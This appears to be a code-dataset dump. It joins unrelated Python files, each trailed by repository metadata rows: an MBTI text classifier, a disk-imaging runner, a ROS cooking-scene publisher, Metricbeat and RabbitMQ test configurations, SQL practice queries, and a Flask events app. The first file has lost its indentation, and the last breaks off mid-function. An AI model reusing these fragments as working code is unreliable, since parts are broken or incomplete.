def mbti_classify(text):
type_indicators = [ "IE: Introversion (I) / Extroversion (E)", "NS: Intuition (N) – Sensing (S)",
"FT: Feeling (F) - Thinking (T)", "JP: Judging (J) – Perceiving (P)" ]
# Posts in tf-idf representation
X = X_tfidf
my_posts = str(text)
# The type is just a dummy so that the data prep fucntion can be reused
mydata = pd.DataFrame(data={'type': ['INFJ'], 'posts': [my_posts]})
my_posts, dummy = pre_process_data(mydata, remove_stop_words=True)
my_X_cnt = cntizer.transform(my_posts)
my_X_tfidf = tfizer.transform(my_X_cnt).toarray()
# setup parameters for xgboost
param = {}
param['n_estimators'] = 200
param['max_depth'] = 2
param['nthread'] = 8
param['learning_rate'] = 0.2
result = []
# Let's train type indicator individually
for l in range(len(type_indicators)):
print("%s ..." % (type_indicators[l]))
Y = list_personality[:,l]
# split data into train and test sets
seed = 7
test_size = 0.33
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)
# fit model on training data
model = XGBClassifier(**param)
model.fit(X_train, y_train)
# make predictions for my data
y_pred = model.predict(my_X_tfidf)
result.append(y_pred[0])
# print("* %s prediction: %s" % (type_indicators[l], y_pred))
print("The result is: ", translate_back(result))
#결과를 리스트에 담고
Result_list = list(translate_back(result))
#mbit 결과값에 따라 내용 print 하기
# read data
# data = pd.read_csv('/Users/jongphilkim/Desktop/Django_WEB/essayfitaiproject/essayai/mbti_exp.csv')
data = pd.read_csv('./mbti/mbti_exp.csv')
#새로운 데이터프레임을 만들어서 계산된 값을 추가할 예정
df2 = pd.DataFrame(index=range(0,4),columns=['Type', 'Explain'])
#리스트에서 한글자씩 불러와서 데이터프레임의 값을 출력하면 됨
for i in range(0, len(Result_list)):
type = Result_list[i]
for j in range(0, len(data)):
if type == data.iloc[j,0]:
break
is_mbti = data.iloc[j,2]
df2.iloc[i, [0,1]] = [type, is_mbti]
print(df2)
return df2
# my_posts = """Describe a place or environment where you are perfectly content. What do you do or experience there, and why is it meaningful to you? 644 words out of 650 Gettysburg, a small town in the middle of Pennsylvania, was the sight of the largest, bloodiest battle in the Civil War. Something about these hallowed grounds draws me back every year for a three day camping trip with my family over Labor Day weekend. Every year, once school starts, I count the days until I take that three and half hour drive from Pittsburgh to Gettysburg. Each year, we leave after school ends on Friday and arrive in Gettysburg with just enough daylight to pitch the tents and cook up a quick dinner on the campfire. As more of the extended family arrives, we circle around the campfire and find out what is new with everyone. The following morning, everyone is up by nine and helping to make breakfast which is our best meal of the day while camping. Breakfast will fuel us for the day as we hike the vast battlefields. My Uncle Mark, my twin brother, Andrew, and I like to take charge of the family tour since we have the most passion and knowledge about the battle. I have learned so much from the stories Mark tells us while walking on the tours. Through my own research during these last couple of trips, I did some of the explaining about the events that occurred during the battle 150 years ago. My fondest experience during one trip was when we decided to go off of the main path to find a carving in a rock from a soldier during the battle. Mark had read about the carving in one of his books about Gettysburg, and we were determined to locate it. After almost an hour of scanning rocks in the area, we finally found it with just enough daylight to read what it said. After a long day of exploring the battlefield, we went back to the campsite for some 'civil war' stew. There is nothing special about the stew, just meat, vegetables and gravy, but for whatever reason, it is some of the best stew I have ever eaten. For the rest of the night, we enjoy the company of our extended family. My cousins, my brother and I listen to the stories from Mark and his friends experiences' in the military. After the parents have gone to bed, we stay up talking with each other, inching closer and closer to the fire as it gets colder. Finally, we creep back into our tents, trying to be as quiet as possible to not wake our parents. The next morning we awake red-eyed from the lack of sleep and cook up another fantastic breakfast. Unfortunately, after breakfast we have to pack up and head back to Pittsburgh. It will be another year until I visit Gettysburg again. There is something about that time I spend in Gettysburg that keeps me coming back to visit. For one, it is just a fun, relaxing time I get to spend with my family. This trip also fulfills my love for the outdoors. From sitting by the campfire and falling asleep to the chirp of the crickets, that is my definition of a perfect weekend. Gettysburg is also an interesting place to go for Civil War buffs like me. While walking down the Union line or walking Pickett's Charge, I imagine how the battle would have been played out around me. Every year when I visit Gettysburg, I learn more facts and stories about the battle, soldiers and generally about the Civil War. While I am in Gettysburg, I am perfectly content, passionate about the history and just enjoying the great outdoors with my family. This drive to learn goes beyond just my passion for history but applies to all of the math, science and business classes I have taken and clubs I am involved in at school. Every day, I am genuinely excited to learn.
# """
# test = mbti_classify(my_posts)
# print ('check')
# test
# print ('check2')
| 41.625455 | 3,675 | 0.653621 | 1,750 | 11,447 | 4.194286 | 0.326857 | 0.006812 | 0.00327 | 0.007084 | 0.107493 | 0.070845 | 0.06049 | 0.053951 | 0.053951 | 0.053951 | 0 | 0.011976 | 0.241373 | 11,447 | 275 | 3,676 | 41.625455 | 0.833026 | 0.451909 | 0 | 0.042553 | 0 | 0.007092 | 0.111929 | 0.024987 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035461 | false | 0 | 0.156028 | 0.007092 | 0.22695 | 0.070922 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6ac1a5f132a19c0dca01d22ddfd3613255dba8b5
| 4,258 |
py
|
Python
|
wce_triage/ops/create_image_runner.py
|
pfrouleau/wce-triage-v2
|
25610cda55f5cb2170e13e121ae1cbaa92ef7626
|
[
"MIT"
] | 3 |
2019-07-25T03:24:23.000Z
|
2021-06-23T14:01:34.000Z
|
wce_triage/ops/create_image_runner.py
|
pfrouleau/wce-triage-v2
|
25610cda55f5cb2170e13e121ae1cbaa92ef7626
|
[
"MIT"
] | 1 |
2019-12-20T16:04:19.000Z
|
2019-12-20T16:04:19.000Z
|
wce_triage/ops/create_image_runner.py
|
pfrouleau/wce-triage-v2
|
25610cda55f5cb2170e13e121ae1cbaa92ef7626
|
[
"MIT"
] | 2 |
2019-07-25T03:24:26.000Z
|
2021-02-14T05:27:11.000Z
|
#!/usr/bin/env python3
#
# Create disk image
#
import re, sys, traceback
from .tasks import task_fetch_partitions, task_refresh_partitions, task_mount, task_remove_persistent_rules, task_remove_logs, task_fsck, task_shrink_partition, task_expand_partition, task_unmount
from .partclone_tasks import task_create_disk_image
from .ops_ui import console_ui
from ..components.disk import create_storage_instance
from .runner import Runner
from ..lib.disk_images import make_disk_image_name
from .json_ui import json_ui
from ..lib.util import init_triage_logger, is_block_device
# "Waiting", "Prepare", "Preflight", "Running", "Success", "Failed"]
my_messages = { "Waiting": "Saving disk is waiting.",
"Prepare": "Savign disk is preparing.",
"Preflight": "Saving disk is preparing.",
"Running": "{step} of {steps}: Running {task}",
"Success": "Saving disk completed successfully.",
"Failed": "Saving disk failed." }
#
class ImageDiskRunner(Runner):
'''Runner for creating disk image. does fsck, shrink partition, create disk
image and resize the file system back to the max.
For now, this is only dealing with the EXT4 linux partition.
'''
# FIXME: If I want to make this to a generic clone app, I need to deal with all of partitions on the disk.
# One step at a time.
def __init__(self, ui, runner_id, disk, destdir, suggestedname=None, partition_id='Linux'):
super().__init__(ui, runner_id)
self.time_estimate = 600
self.disk = disk
self.partition_id = partition_id
self.destdir = destdir
self.imagename = make_disk_image_name(destdir, suggestedname)
pass
def prepare(self):
super().prepare()
# self.tasks.append(task_mount_nfs_destination(self, "Mount the destination volume"))
self.tasks.append(task_fetch_partitions("Fetch partitions", self.disk))
self.tasks.append(task_refresh_partitions("Refresh partition information", self.disk))
self.tasks.append(task_mount("Mount the target disk", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_remove_persistent_rules("Remove persistent rules", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_remove_logs("Remove/Clean Logs", disk=self.disk, partition_id=self.partition_id))
task = task_unmount("Unmount target", disk=self.disk, partition_id=self.partition_id)
task.set_teardown_task()
self.tasks.append(task)
self.tasks.append(task_fsck("fsck partition", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_shrink_partition("Shrink partition to smallest", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_create_disk_image("Create disk image", disk=self.disk, partition_id=self.partition_id, imagename=self.imagename))
task = task_expand_partition("Expand the partion back", disk=self.disk, partition_id=self.partition_id)
task.set_teardown_task()
self.tasks.append(task)
pass
pass
if __name__ == "__main__":
tlog = init_triage_logger()
if len(sys.argv) == 1:
print( 'Unloader: devicename part destdir')
sys.exit(0)
# NOTREACHED
pass
devname = sys.argv[1]
if not is_block_device(devname):
print( '%s is not a block device.' % devname)
sys.exit(1)
# NOTREACHED
pass
part = sys.argv[2] # This is a partition id
destdir = sys.argv[3] # Destination directory
disk = create_storage_instance(devname)
# Preflight is for me to see the tasks. http server runs this with json_ui.
do_it = True
if destdir == "preflight":
ui = console_ui()
do_it = False
pass
elif destdir == "testflight":
ui = console_ui()
do_it = True
pass
else:
ui = json_ui(wock_event="saveimage", message_catalog=my_messages)
pass
if re.match(part, '\d+'):
part = int(part)
pass
runner_id = disk.device_name
runner = ImageDiskRunner(ui, runner_id, disk, destdir, partition_id=part)
try:
runner.prepare()
runner.preflight()
runner.explain()
runner.run()
sys.exit(0)
# NOTREACHED
except Exception as exc:
sys.stderr.write(traceback.format_exc(exc) + "\n")
sys.exit(1)
# NOTREACHED
pass
pass
| 35.190083 | 196 | 0.711837 | 593 | 4,258 | 4.903879 | 0.284992 | 0.079436 | 0.067056 | 0.071871 | 0.237276 | 0.18088 | 0.162311 | 0.162311 | 0.149243 | 0.134801 | 0 | 0.003726 | 0.180601 | 4,258 | 120 | 197 | 35.483333 | 0.829751 | 0.155707 | 0 | 0.27381 | 0 | 0 | 0.142457 | 0 | 0 | 0 | 0 | 0.008333 | 0 | 1 | 0.02381 | false | 0.130952 | 0.107143 | 0 | 0.142857 | 0.02381 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6ac3173f834c06ec5469554b76a1d8e391432cee
| 5,171 |
py
|
Python
|
demos/chicken_pasta/chicken_pasta.py
|
icaros-usc/wecook
|
27bbb6b78a48e04765a87d33cc8a5d3748d2d4cc
|
[
"BSD-3-Clause"
] | 15 |
2019-09-15T05:24:19.000Z
|
2021-02-26T20:31:19.000Z
|
demos/chicken_pasta/chicken_pasta.py
|
icaros-usc/wecook
|
27bbb6b78a48e04765a87d33cc8a5d3748d2d4cc
|
[
"BSD-3-Clause"
] | 16 |
2019-10-10T23:27:00.000Z
|
2020-05-14T02:30:56.000Z
|
demos/chicken_pasta/chicken_pasta.py
|
icaros-usc/wecook
|
27bbb6b78a48e04765a87d33cc8a5d3748d2d4cc
|
[
"BSD-3-Clause"
] | 2 |
2020-02-01T16:31:29.000Z
|
2020-04-07T21:00:04.000Z
|
#!/usr/bin/env python3
import rospy
from wecook.msg import ActionMsg, TaskMsg, SceneMsg, ObjectMsg, ContainingMsg, AgentMsg
def talker():
pub = rospy.Publisher('WeCookDispatch', TaskMsg, queue_size=10)
rospy.init_node('wecook_chicken_pasta', anonymous=True)
scene_msg = SceneMsg([ObjectMsg('wall0',
'package://wecook_assets/data/furniture/wall.urdf',
[0.75, 0.05, 0., 0., 0., 0., 1.]),
ObjectMsg('wall1',
'package://wecook_assets/data/furniture/wall.urdf',
[-0.85, 1.45, 0., 0., 0., 0.707, 0.707]),
ObjectMsg('counter0',
'package://wecook_assets/data/furniture/kitchen_counter.urdf',
[0.3, 0., 0., 0., 0., 0., 1.]),
ObjectMsg('counter1',
'package://wecook_assets/data/furniture/kitchen_counter.urdf',
[0., 1.0, 0., 0., 0., 0.707, 0.707]),
ObjectMsg('sink0',
'package://wecook_assets/data/furniture/sink_counter.urdf',
[-1.3, 1.05, 0., 0., 0., 0.707, 0.707]),
ObjectMsg('shelf0',
'package://wecook_assets/data/furniture/bookcase.urdf',
[0.3, -1.05, 0., 0., 0., 0., 1.]),
ObjectMsg('stove0',
'package://wecook_assets/data/objects/stove.urdf',
[-0.35, 0.95, 0.75, 0., 0., 0., 1.]),
ObjectMsg('pot0',
'package://wecook_assets/data/objects/cooking_pot.urdf',
[0.35, 1.1, 0.75, 0., 0., 0., 1.]),
ObjectMsg('skillet0',
'package://wecook_assets/data/objects/skillet.urdf',
[0.3, 0.7, 0.75, 0., 0., -0.707, .707]),
ObjectMsg('cutting_board0',
'package://wecook_assets/data/objects/cutting_board.urdf',
[0.3, -0.3, 0.75, 0., 0., 0., 1.]),
ObjectMsg('knife0',
'package://wecook_assets/data/objects/knife_big.urdf',
[0.215, -0.55, 0.775, 0., 0., 0., 1.]),
ObjectMsg('plate0',
'package://wecook_assets/data/objects/plate.urdf',
[0.3, 0.075, 0.75, 0., 0., 0., 1.]),
ObjectMsg('bowl0',
'package://wecook_assets/data/objects/bowl_green.urdf',
[0.45, 0.375, 0.75, 0., 0., 0., 1.]),
ObjectMsg('bowl1',
'package://wecook_assets/data/objects/bowl_green.urdf',
[0.15, 0.375, 0.75, 0., 0., 0., 1.]),
ObjectMsg('oil0',
'package://wecook_assets/data/objects/olive_oil.urdf',
[0., 1.15, 0.75, 0., 0., 0.707, 0.707]),
ObjectMsg('salt0',
'package://wecook_assets/data/objects/salt.urdf',
[0., 1.0, 0.75, 0., 0., 0.707, 0.707]),
ObjectMsg('pepper0',
'package://wecook_assets/data/objects/black_pepper.urdf',
[0., 0.9, 0.75, 0., 0., 0.707, 0.707]),
ObjectMsg('chicken0',
'package://wecook_assets/data/food/chicken.urdf',
[0.3, 0.075, 0.757, 0., 0., 0., 1.]),
ObjectMsg('lime0',
'package://wecook_assets/data/food/lime.urdf',
[0.3, -0.3, 0.757, 0., 0., 0., 1.]),
ObjectMsg('pasta0',
'package://wecook_assets/data/food/pasta.urdf',
[0.45, 0.375, 0.757, 0., 0., 0., 1.])],
[ContainingMsg(['plate0', 'chicken0']),
ContainingMsg(['bowl0', 'pasta0'])])
task_msg = TaskMsg(scene_msg,
[ActionMsg(['p1'], 'cut', ['plate0'], 'knife0', ['lime0'])],
[AgentMsg('p1', 'r', [0., 0., 0.75, 0., 0., 0., 0.])],
"",
"",
"follow",
"RRTConnect",
False)
# sleeping 10 seconds to publish
rospy.sleep(1)
pub.publish(task_msg)
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass
| 55.010638 | 98 | 0.375169 | 482 | 5,171 | 3.927386 | 0.242739 | 0.058109 | 0.049128 | 0.243001 | 0.58056 | 0.349709 | 0.303222 | 0.231379 | 0.156366 | 0 | 0 | 0.11743 | 0.47631 | 5,171 | 93 | 99 | 55.602151 | 0.58161 | 0.010056 | 0 | 0.097561 | 0 | 0 | 0.243502 | 0.197772 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012195 | false | 0.012195 | 0.02439 | 0 | 0.036585 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6ac3c0aa131a8fbf4b061367a8fbb2e23790a4c8
| 3,777 |
py
|
Python
|
metricbeat/module/postgresql/test_postgresql.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 4 |
2020-11-17T06:29:30.000Z
|
2021-08-08T11:56:01.000Z
|
metricbeat/module/postgresql/test_postgresql.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 36 |
2021-02-02T14:18:40.000Z
|
2022-03-20T15:07:30.000Z
|
metricbeat/module/postgresql/test_postgresql.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 6 |
2021-03-10T05:38:32.000Z
|
2021-08-16T13:11:19.000Z
|
import metricbeat
import os
import pytest
import sys
import unittest
class Test(metricbeat.BaseTest):
COMPOSE_SERVICES = ['postgresql']
def common_checks(self, output):
# Ensure no errors or warnings exist in the log.
self.assert_no_logged_warnings()
for evt in output:
top_level_fields = metricbeat.COMMON_FIELDS + ["postgresql"]
self.assertCountEqual(self.de_dot(top_level_fields), evt.keys())
self.assert_fields_are_documented(evt)
def get_hosts(self):
username = "postgres"
host = self.compose_host()
dsn = "postgres://{}?sslmode=disable".format(host)
return (
[dsn],
username,
os.getenv("POSTGRESQL_PASSWORD"),
)
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
@pytest.mark.tag('integration')
def test_activity(self):
"""
PostgreSQL module outputs an event.
"""
hosts, username, password = self.get_hosts()
self.render_config_template(modules=[{
"name": "postgresql",
"metricsets": ["activity"],
"hosts": hosts,
"username": username,
"password": password,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
output = self.read_output_json()
self.common_checks(output)
for evt in output:
assert "name" in evt["postgresql"]["activity"]["database"]
assert "oid" in evt["postgresql"]["activity"]["database"]
assert "state" in evt["postgresql"]["activity"]
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
@pytest.mark.tag('integration')
def test_database(self):
"""
PostgreSQL module outputs an event.
"""
hosts, username, password = self.get_hosts()
self.render_config_template(modules=[{
"name": "postgresql",
"metricsets": ["database"],
"hosts": hosts,
"username": username,
"password": password,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
output = self.read_output_json()
self.common_checks(output)
for evt in output:
assert "name" in evt["postgresql"]["database"]
assert "oid" in evt["postgresql"]["database"]
assert "blocks" in evt["postgresql"]["database"]
assert "rows" in evt["postgresql"]["database"]
assert "conflicts" in evt["postgresql"]["database"]
assert "deadlocks" in evt["postgresql"]["database"]
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
@pytest.mark.tag('integration')
def test_bgwriter(self):
"""
PostgreSQL module outputs an event.
"""
hosts, username, password = self.get_hosts()
self.render_config_template(modules=[{
"name": "postgresql",
"metricsets": ["bgwriter"],
"hosts": hosts,
"username": username,
"password": password,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
output = self.read_output_json()
self.common_checks(output)
for evt in output:
assert "checkpoints" in evt["postgresql"]["bgwriter"]
assert "buffers" in evt["postgresql"]["bgwriter"]
assert "stats_reset" in evt["postgresql"]["bgwriter"]
| 32.843478 | 76 | 0.581943 | 380 | 3,777 | 5.626316 | 0.247368 | 0.028064 | 0.084191 | 0.064546 | 0.697381 | 0.623012 | 0.579046 | 0.579046 | 0.579046 | 0.579046 | 0 | 0.00224 | 0.290707 | 3,777 | 114 | 77 | 33.131579 | 0.795819 | 0.041038 | 0 | 0.556818 | 0 | 0 | 0.182432 | 0.008164 | 0 | 0 | 0 | 0 | 0.170455 | 1 | 0.056818 | false | 0.079545 | 0.056818 | 0 | 0.147727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6ac4ca9b00a8492410dc6166ad36ac8d64fdcffc
| 2,337 |
py
|
Python
|
rabbitmq/tests/common.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | 1 |
2021-03-24T13:00:14.000Z
|
2021-03-24T13:00:14.000Z
|
rabbitmq/tests/common.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | null | null | null |
rabbitmq/tests/common.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
from packaging import version
from datadog_checks.base.utils.common import get_docker_hostname
HERE = os.path.dirname(os.path.abspath(__file__))
ROOT = os.path.dirname(os.path.dirname(HERE))
RABBITMQ_VERSION_RAW = os.environ['RABBITMQ_VERSION']
RABBITMQ_VERSION = version.parse(RABBITMQ_VERSION_RAW)
CHECK_NAME = 'rabbitmq'
HOST = get_docker_hostname()
PORT = 15672
URL = 'http://{}:{}/api/'.format(HOST, PORT)
CONFIG = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'queues': ['test1'],
'tags': ["tag1:1", "tag2"],
'exchanges': ['test1'],
}
CONFIG_NO_NODES = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'queues': ['test1'],
'tags': ["tag1:1", "tag2"],
'exchanges': ['test1'],
'collect_node_metrics': False,
}
CONFIG_REGEX = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'queues_regexes': [r'test\d+'],
'exchanges_regexes': [r'test\d+'],
}
CONFIG_VHOSTS = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'vhosts': ['/', 'myvhost'],
}
CONFIG_WITH_FAMILY = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'tag_families': True,
'queues_regexes': [r'(test)\d+'],
'exchanges_regexes': [r'(test)\d+'],
}
CONFIG_DEFAULT_VHOSTS = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'vhosts': ['/', 'test'],
}
CONFIG_TEST_VHOSTS = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'vhosts': ['test', 'test2'],
}
EXCHANGE_MESSAGE_STATS = {
'ack': 1.0,
'ack_details': {'rate': 1.0},
'confirm': 1.0,
'confirm_details': {'rate': 1.0},
'deliver_get': 1.0,
'deliver_get_details': {'rate': 1.0},
'publish': 1.0,
'publish_details': {'rate': 1.0},
'publish_in': 1.0,
'publish_in_details': {'rate': 1.0},
'publish_out': 1.0,
'publish_out_details': {'rate': 1.0},
'return_unroutable': 1.0,
'return_unroutable_details': {'rate': 1.0},
'redeliver': 1.0,
'redeliver_details': {'rate': 1.0},
}
| 23.606061 | 64 | 0.618314 | 291 | 2,337 | 4.694158 | 0.323024 | 0.023426 | 0.070278 | 0.076135 | 0.489751 | 0.418009 | 0.418009 | 0.418009 | 0.418009 | 0.418009 | 0 | 0.027749 | 0.182713 | 2,337 | 98 | 65 | 23.846939 | 0.687435 | 0.046213 | 0 | 0.341772 | 0 | 0 | 0.402247 | 0.011236 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.088608 | 0.037975 | 0 | 0.037975 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6ac55faf90a367de65f30a569842061f13204e0c
| 2,952 |
py
|
Python
|
module1-introduction-to-sql/query.py
|
jrslagle/DS-Unit-3-Sprint-2-SQL-and-Databases
|
8a6b3fd14b6a6833ee3a14b2d8a7db3bee494a14
|
[
"MIT"
] | null | null | null |
module1-introduction-to-sql/query.py
|
jrslagle/DS-Unit-3-Sprint-2-SQL-and-Databases
|
8a6b3fd14b6a6833ee3a14b2d8a7db3bee494a14
|
[
"MIT"
] | null | null | null |
module1-introduction-to-sql/query.py
|
jrslagle/DS-Unit-3-Sprint-2-SQL-and-Databases
|
8a6b3fd14b6a6833ee3a14b2d8a7db3bee494a14
|
[
"MIT"
] | null | null | null |
# Look at the charactercreator_character table
# GET_CHARACTERS = """
# SELECT *
# FROM charactercreator_character;
# """
# How many total Characters are there? (302)
TOTAL_CHARACTERS = """
SELECT COUNT(*) as number_of_characters
FROM charactercreator_character;
"""
# How many of each specific subclass?
# TOTAL_SUBCLASS = """
# SELECT
# (SELECT COUNT(*) FROM charactercreator_necromancer) AS necros,
# (SELECT COUNT(*) FROM charactercreator_mage) AS mages,
# (SELECT COUNT(*) FROM charactercreator_thief) AS thiefs,
# (SELECT COUNT(*) FROM charactercreator_cleric) AS clerics,
# (SELECT COUNT(*) FROM charactercreator_fighter) AS fighters;
# """
CLASS = "SELECT COUNT(*) FROM charactercreator_"
# How many total Items? (174)
TOTAL_ITEMS = """
SELECT COUNT(item_id) as items
FROM armory_item;
"""
# How many of the Items are weapons? (37)
WEAPONS = """
SELECT COUNT(item_ptr_id)
FROM armory_weapon;
"""
# How many of the items are not weapons? (137)
NON_WEAPONS = """
SELECT COUNT(items.name)
FROM armory_item as items
WHERE items.item_id NOT IN(
SELECT armory_weapon.item_ptr_id
FROM armory_weapon);
"""
# How many Items does each character have? (Return first 20 rows)
CHARACTER_ITEMS = """
SELECT character.name as "character_name", COUNT(inventory.id) as "#_of_items"
FROM charactercreator_character AS character, charactercreator_character_inventory AS inventory
WHERE character.character_id = inventory.character_id
GROUP BY character.name
ORDER BY character.name
LIMIT 20;
"""
# How many Weapons does each character have? (Return first 20 rows)
CHARACTER_WEAPONS = """
SELECT character.name as "character_name", COUNT(weapon.item_ptr_id) as "#_of_weapons"
FROM charactercreator_character AS character, charactercreator_character_inventory AS inventory, armory_weapon as weapon
WHERE character.character_id = inventory.character_id AND inventory.item_id = weapon.item_ptr_id
GROUP BY character.name
ORDER BY character.name
LIMIT 20;
"""
# On average, how many Items does each Character have? (3.02)
AVG_CHARACTER_ITEMS = """
SELECT
AVG("#_of_items") as "avg_#_of_items"
FROM
(
SELECT
COUNT(inventory.id) AS "#_of_items"
FROM
charactercreator_character AS character,
charactercreator_character_inventory AS inventory
WHERE
character.character_id = inventory.character_id
GROUP BY character.name
);
"""
# On average, how many Weapons does each character have? (0.67)
AVG_CHARACTER_WEAPONS = """
SELECT
AVG(weapon_count) as avg_weapons_per_char
FROM (
SELECT
character.character_id,
COUNT(DISTINCT weapon.item_ptr_id) as weapon_count
FROM
charactercreator_character AS character
LEFT JOIN charactercreator_character_inventory inventory -- characters may have zero items
ON character.character_id = inventory.character_id
LEFT JOIN armory_weapon weapon -- many items are not weapons, so only retain weapons
ON inventory.item_id = weapon.item_ptr_id
GROUP BY character.character_id
) subq;
"""
| 28.941176 | 120 | 0.774051 | 404 | 2,952 | 5.445545 | 0.195545 | 0.109091 | 0.079545 | 0.084545 | 0.530455 | 0.464091 | 0.430909 | 0.337727 | 0.308636 | 0.265909 | 0 | 0.009827 | 0.138211 | 2,952 | 101 | 121 | 29.227723 | 0.854953 | 0.300474 | 0 | 0.328358 | 0 | 0 | 0.882353 | 0.267647 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6ac7d878414c23d75e260d1c447ced1efb264340
| 2,420 |
py
|
Python
|
events_page/app.py
|
los-verdes/lv-event-pagenerator
|
88416b626ff2dca6e2d71fa60bff4823954b3131
|
[
"MIT"
] | null | null | null |
events_page/app.py
|
los-verdes/lv-event-pagenerator
|
88416b626ff2dca6e2d71fa60bff4823954b3131
|
[
"MIT"
] | 7 |
2022-01-16T15:36:40.000Z
|
2022-01-25T22:02:12.000Z
|
events_page/app.py
|
los-verdes/lv-event-pagenerator
|
88416b626ff2dca6e2d71fa60bff4823954b3131
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from zoneinfo import ZoneInfo
import flask
from dateutil.parser import parse
from flask_assets import Bundle, Environment
from logzero import logger, setup_logger
from webassets.filter import get_filter
from config import cfg
from apis import calendar as gcal
setup_logger(name=__name__)
app = flask.Flask(__name__)
libsass = get_filter(
"libsass",
as_output=True,
style="compressed",
)
assets = Environment(app) # create an Environment instance
bundles = { # define nested Bundle
"style": Bundle(
"scss/*.scss",
filters=(libsass),
output="style.css",
)
}
assets.register(bundles)
@app.route("/")
def events():
return flask.render_template(
"index.html",
calendar=gcal.load_calendar(
service=gcal.build_service(),
calendar_id=cfg.calendar_id,
),
)
@app.template_filter()
def parse_tz_datetime(datetime_str):
return parse(datetime_str).replace(tzinfo=ZoneInfo(app.config["display_timezone"]))
@app.template_filter()
def replace_tz(datetime_obj):
return datetime_obj.replace(tzinfo=ZoneInfo(app.config["display_timezone"]))
@app.template_filter()
def hex2rgb(hex, alpha=None):
"""Convert a string to all caps."""
if not hex.startswith("#"):
return hex
h = hex.lstrip("#")
try:
rgb = tuple(int(h[i : i + 2], 16) for i in (0, 2, 4)) # noqa
except Exception as err:
logger.exception(f"unable to convert {hex=} to rgb: {err}")
return h
if alpha is None:
return f"rgb({rgb[0]}, {rgb[1]}, {rgb[2]})"
else:
return f"rgba({rgb[0]}, {rgb[1]}, {rgb[2]}, {alpha})"
def get_base_url():
if prefix := cfg.gcs_bucket_prefix:
return f"https://{cfg.hostname}/{prefix}"
return f"https://{cfg.hostname}"
def create_app():
